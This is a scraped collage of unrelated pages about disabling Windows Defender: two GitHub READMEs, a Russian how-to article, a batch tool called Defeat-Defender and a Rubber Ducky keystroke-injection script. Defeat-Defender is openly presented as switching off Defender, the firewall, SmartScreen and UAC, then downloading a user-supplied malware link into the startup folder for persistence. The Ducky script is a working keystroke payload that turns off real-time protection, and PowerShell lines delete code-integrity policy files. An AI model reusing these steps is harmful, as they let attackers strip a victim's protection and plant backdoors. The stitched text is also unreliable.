Disable windows defender windows 10 github

❌️ Defender Remover / Defender Disabler

❓️ What does the app do?

This application removes / disables Windows Defender, including the Windows Security App, Windows Virtualization-Based Security (VBS), Windows SmartScreen, Windows Security Services, Windows Web-Threat Service, Windows File Virtualization (UAC), Microsoft Defender App Guard, Microsoft Driver Block List, System Mitigations and the Windows Defender page in the Settings App on Windows 10 or later.

🖍 System Requirements

Windows 8.x, 10 and 11 (all versions).

📃 Instructions

Note
A system restore point is recommended before you run the script.

Download the packed script from Releases
Run the «.exe» as administrator
Follow the instructions displayed

cli

Please file an issue if you experience any problems.

📃 Automation of the script

You can disable or enable Windows Defender with arguments.

Enable/Disable Windows Defender and Security Components

# ENABLE
Defender.Remover.exe /r <# or /R #>

# DISABLE
Defender.Remover.exe /n <# or /N #>

Enable/Disable Windows Defender Antivirus only

# ENABLE
Defender.Remover.exe /e <# or /E #>

# DISABLE
Defender.Remover.exe /m <# or /M #>

Disable or Remove Windows Defender Application Guard Policies (advanced)

If you have any problems when opening an app (extremely rare) and get the message «The app can not run because Device Guard» or «Windows Defender Application Guard Blocked this app», you have to remove 4 files with the same name, from different locations.

In EFI Partition

Remove-Item -LiteralPath "$((Get-Partition | ? IsSystem).AccessPaths[0])Microsoft\Boot\WiSiPolicy.p7b"

In Code Integrity Folder

Remove-Item -LiteralPath "$env:windir\System32\CodeIntegrity\WiSiPolicy.p7b"

In Windows Folder

Remove-Item -LiteralPath "$env:windir\Boot\EFI\wisipolicy.p7b"

In WinSxS Folder

Remove-Item -Path "$env:windir\WinSxS" -Include *winsipolicy.p7b* -Recurse

❓ Frequently Asked Questions

⭕ Why is the downloaded executable being flagged as a virus?

That is a false positive.

Some security apps flag this app as a virus because of the way the «.exe» files are created.

⭕ Why is the patch not working when Windows is updated?

Windows Update includes a Intelligence Update which blocks certain actions and modifies Windows Defender/Security policies.
If the script is not working for you, check if you have the Windows Security Intelligence Update installed. If you do, disable tamper protection, and re-run the script.

⭕ How to use the package remover without downloading the executable from the release?

Run the desired «.bat» file from cmd with PowerRun (by dragging to the executable). You must reboot for the changes to take effect.

Источник

permalink	layout
index.html	default

Disable Windows Defender on Windows 10

NOTICE: Permenantly disabling Windows Defender is
no longer possible
in recent Windows 10 versions. Instead, you can only rely on excluding specific
folders or disabling it temporarily.

Why?

Windows Defender is infamous for its tendency to monopolize CPU and I/O
resources. Moreover, some of its «security» measures are undesirable and may
put user privacy at risk. This has many practical consequences, such as:

slower general operation due to increased resource usage,
excessive CPU usage while copying files, slowing down the entire system,
increased heat and noise output, as well as reduced battery life on laptops,
deletion of files detected as «malware» without the user’s consent, even in
ZIP archives or on attached network drives,
user privacy at risk, due to automatic sending of «malware samples» to
Microsoft,
…

Windows 10 allows you to disable Windows Defender in the Settings, but this is
only temporarily effective; it will be automatically re-enabled eventually –
the exact timing for this is random and unpredictable.

This repository contains a «disable» .reg file which can be used to
permanently disable Windows Defender. But don’t worry, you can revert it
using the included «restore» .reg file.

Usage

Disabling Windows Defender permanently

Clone this repository or
download a ZIP archive.
Double-click disable_windows_defender_on_windows_10.reg then accept the
administrator and the warning prompts.
Reboot your system.

Restoring Windows Defender (in case something goes wrong)

Clone this repository or
download a ZIP archive.
Double-click restore_windows_defender_on_windows_10.reg then accept the
administrator and the warning prompts.
Reboot your system.

Frequently asked questions

Isn’t it insecure to disable Windows Defender?

With today’s security threats, antivirus software is becoming
less relevant over the years. Many antiviruses are now fooled by malware
executables, and other forms of malware aren’t detected by most antiviruses.
While perfect security doesn’t exist, it still is a good idea to avoid exposing
yourself to modern threats such as ransomware.

To make your computing more secure, consider the following options:

Block tracking and malware scripts using
uBlock Origin.
This will also make browsing faster and decrease network traffic.
Block tracking and malware domains using
Dan Pollock’s hosts file.
This has the upside of working on all software on your computer,
not just Web browsers.

License

Files in this repository are licensed under CC0 1.0 Universal,
see LICENSE.md for more information.

Источник

Defeat-Defender-1.2

If you like the tool and for my personal motivation so as to develop other tools please leave a +1 star

Powerfull Batch File To Disable Windows Defender,Firewall,Smartscreen And Execute the payload

Usage :

Run run.bat and enter the direct link of your malware
Run the script «Defeat-Defender.bat» . It will ask for Admin Permission.If permission Granted The script will work Silently and dismantle all protection…

After it got admin permission it will disable defender

PUAProtection
Automatic Sample Submission
Windows FireWall
Windows Smart Screen(Permanently)
Disable Quickscan
Add exe file to exclusions in defender settings
Disable Defender Notification (Added Recently)
Disable UAC(Reboot Required)
Disable Ransomware Protection
Disable TaskManager
Disable registry etc..

Proof-Of-Concept

defeat-defender_W89Khs8L_TvOB.mp4

Bypasssing Windows-Defender Techniques :

Recently Windows Introduced new Feature called «Tamper Protection».Which Prevents the disable of real-time protection and modifying defender registry keys using powershell or cmd…If you need to disable real-time protection you need to do manually….But We will disable Real Time Protection using NSudo without trigerring Windows Defender

Running Defeat-Defender Script

Tested on Windows 11 Pro

After Reboot

Warning

This Script will completely Disable Windefend Services . And also it is very difficult to revert the changes..Think twice before you run the script

Behind The Scenes :

When Batch file is executed it ask for admin permissions.After getting admin privileage it starts to disable windows defender real time protectin , firewall , smartscreen and starts downloading our backdoor from server and it will placed in startup folder.The backdoor will be executed after it has downloaded from server..And will be started whenever system starts..

Check out this article :

https://secnhack.in/create-fud-fully-undetectable-payload-for-windows-10/

Note :

If you want to enable Defender Smart Screen.Use Smart Screen.bat file..

Discalimer :

Use this only for educational Purpose…Love you Guys Bye…..

Contact :

Inspired From TechChip

Special thanks to Jeffrey-d-howard(Senior Vulnerability Management Lead) For Posting Defeat-Defender on his linked page

❤️Supporters❤️

Источник

Дарёному коню в зубы не смотрят, но не в нашем случае)!

В Windows 10 имеется интегрированный антивирус Windows Defender («Защитник Windows»), который выполняет функции защиты нашего компьютера и данных на нём от нежелательных программ.

Встроенное решение от Microsoft пагубно влияет на производительность системы, запускаясь вместе с ней, работает в фоновом режиме, собирая статистику о системе, и имеет привычку обновляться в «удобное» для него время. Также бывают ситуации, например, когда необходимо настроить устройство под себя или установить какой-то файл из Интернета, что, конечно же, «Защитник Windows» будет блокировать.

Тогда перед Вами станет задача отключить данную систему или вовсе искоренить из системы, но есть проблема: полностью удалить или отключить Windows Defender у Вас не выйдет – эта система глубоко интегрирована в Windows 10 и в последующие версии, начиная с 1903 version (С выходом Windows 10 May 2019 Update (версия 1903) Microsoft представила функцию «Защита от подделки», которая предотвращает изменение настроек приложения «Безопасность Windows» и антивируса Microsoft Defender вне интерфейса Windows. Под термином «настройки» здесь также учитываются инструменты командной строки, изменения реестра и групповых политик).
Однако, не спешите отчаиваться, есть несколько обходных путей, при помощи которых мы сейчас отключим антивирус Windows.

Для этого нам понадобятся 2 программы:
1) Defender Control — https://www.sordum.org/9480/defender-control-v2-1/ (официальный сайт) 2) Reg organizer — https://chemtable.ru/organizer.htm (официальный сайт)

Далее по пунктам:

1. Устанавливаем и открываем Defender Control:

3 файл-сценария

2. Нас интересует 3 файл «Defender_Settings». Открываем его, нас перекидывает в «Параметры Безопасности Windows», отключаем все ползунки до самого конца страницы.

Не забудьте проверить, чтобы все ползунки были в состоянии «откл».

3. Далее открываем первую папку «dControl» и открываем первое приложение.

В открывшимся окне выбираем пункт «Отключить Защитник Windows», после чего Вы должны увидеть характерный красный цвет интерфейса.

5. Устанавливаем и открываем Reg organizer.

6. В левой панели открываем вкладку «Другие функции» и выбираем «Редактор Реестра»:

Далее просто копируете путь: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender

Вы сразу попадаете в нужную папку, где необходимо правой кнопкой мыши нажать на пустое место, выбрать «Создать 32-битный целочисленный параметр (REG_DWORD)». Далее обязательно называем новый ключ DisableAntiSpyware и нажимаем «ОК».
Затем двойным щелчком откройте редактор ключа и задайте ему значение «1». Проверьте, чтобы все значения были, как на скриншоте ниже.

Название обязательно должно быть именно таким, значение «1» также важно!

7. Отлично, осталось немного! Теперь чуть выше находим «Автозапуск программ», заходим в него. Выбираем Windows Security, правой кнопкой мыши выбираем пункт «Удалить и не давать появиться снова». Жмём «ОК».

У Вас это может выглядеть иначе, главное смотреть на название. Это может быть и «Защитник Windows»

Перезагружаем компьютер и радуемся отсутствию Defender-а. Победа!

Если кому-то будет полезно регулярное временное отключение, то:

Открываем PowerShell от имени Администратора и прописываем:

Set-MpPreference -DisableRealtimeMonitoring $true — чтобы выключить

Set-MpPreference -DisableRealtimeMonitoring $false — чтобы включить

Немного рекомендаций от автора: (к прочтению необязательно)

Несмотря на возможность отключения Защитника Windows, автор статьи не рекомендует использовать компьютер без антивируса вообще. Будет хорошо иметь на своём ПК антивирусное решение или хотя бы раз в месяц использовать » Полное сканирование системы». Для избежания проблем, советую обратить внимание в сторону отечественных ПО: Антивирус Kaspersky, Dr.Web и NANO Антивирус. Первые два антивируса входят в «Реестр отечественного ПО», а третий, в свою очередь, – «Единый реестр российских программ для ЭВМ и БД».
Пройдёмся кратко по каждому:

1) Dr.Web:

Российский производитель антивирусных средств защиты информации. Продукты Dr.Web разрабатываются с 1992 года. Это один из первых антивирусов в мире. Компания «Доктор Веб» — ключевой игрок на российском рынке программных средств обеспечения базовой потребности бизнеса — безопасности информации.

Стоимость: от 1209 ₽ в год (1 ПК + 1 Android)
Пробный период платной версии: 30 дней, (без техподдержки и защита только 1 ПК).

Интерфейс

Также имеется Dr.Web CureIt! — лечащая утилита «Dr.Web CureIt!», которая не является постоянным средством для защиты компьютера от вирусов, но способна вылечить инфицированную систему однократно.

2) Kaspersky Total Security:

Стоимость: от 1709 Р в год
Пробный период платной версии: 30 дней

«Лаборатория Касперского» — международная компания, работающая в сфере информационной безопасности и цифровой приватности с 1997 года. Глубокие экспертные знания и многолетний опыт компании лежат в основе защитных решений и сервисов нового поколения, обеспечивающих безопасность бизнеса, критически важной инфраструктуры, государственных органов и рядовых пользователей. Обширное портфолио «Лаборатории Касперского» включает в себя передовые технологии для защиты конечных устройств, ряд специализированных продуктов и сервисов, а также кибериммунные решения для борьбы со сложными и постоянно эволюционирующими киберугрозами.

Интерфейс бесплатной версии программы

Помимо платных версий, имеются полностью бесплатные решения. В полностью бесплатной версии доступно:

· Помогает обеспечить безопасность устройств

Решение Kaspersky Free оснащено передовыми технологиями безопасности. Оно автоматически анализирует новые угрозы в реальном времени, помогая защищать компьютеры, мобильные устройства и планшеты, в том числе iPad.

· Бесплатный антивирус и не только

Kaspersky Free – это бесплатное антивирусное решение, которое защищает компьютеры с ОС Windows и мобильные устройства Android от вредоносного ПО, зараженных файлов, опасных приложений и подозрительных сайтов.

· Безопасность без замедления работы

Система безопасности защищает устройства, не мешая вашей работе. Kaspersky Free получает обновления автоматически, благодаря чему у вас всегда будет актуальная версия антивируса.

3) NANO Антивирус:

Стоимость: от 799 Р в год
Пробный период платной версии: 30 дней

Компания NANO Security создана в 2009 году на базе коллектива высококвалифицированных специалистов, работающих в области антивирусной безопасности с 2003 года.

Главной идеей проекта было предложить основанные на тщательно изученных предпочтениях пользователей и клиентов программные продукты, выгодно отличающиеся по ряду параметров от антивирусных решений других производителей.

Сегодня NANO Security представляет собой команду профессионалов, обладающих высокими компетенциями. В компании работают опытные эксперты в области информационной безопасности: программисты, аналитики, тестировщики и т.д.

Интерфейс внутри приложения

Надеюсь, статья вышла для Вас полезной.
Далее планирую написать про хорошие антивирусные решения, которые продолжают на сегодняшний день работать/продаваться/обновляться на территории РФ.

Источник

Payload : Disable Windows Defender

Date 05-11-2021

Target : Windows 10 And Windows 11

This Code Was Tested On Windows 10 OS build 19043.1288 And Windows 11 OS build 22000.282

Note : Older PC’s May Require More Delay.

This Code Can Also Combined With Other Ducky Scripts.

REM Author : @krishnachaittanyah
REM This Script Will Disable Real Time Protection
REM *********************
REM We're going to disable Real Time Protection
REM *********************
DELAY 1000
GUI 
DELAY 500
STRING virus & threat protection
ENTER
DELAY 3000
TAB 
TAB
TAB
TAB
DELAY 200
ENTER
DELAY 200
SPACE 
DELAY 3000
ALT y

How do The Following Scrip Work ?

First, This will search and open Virus & Threat Protection Tab

and then it will enter into manage settings disable Windows Real Time Protection.

Источник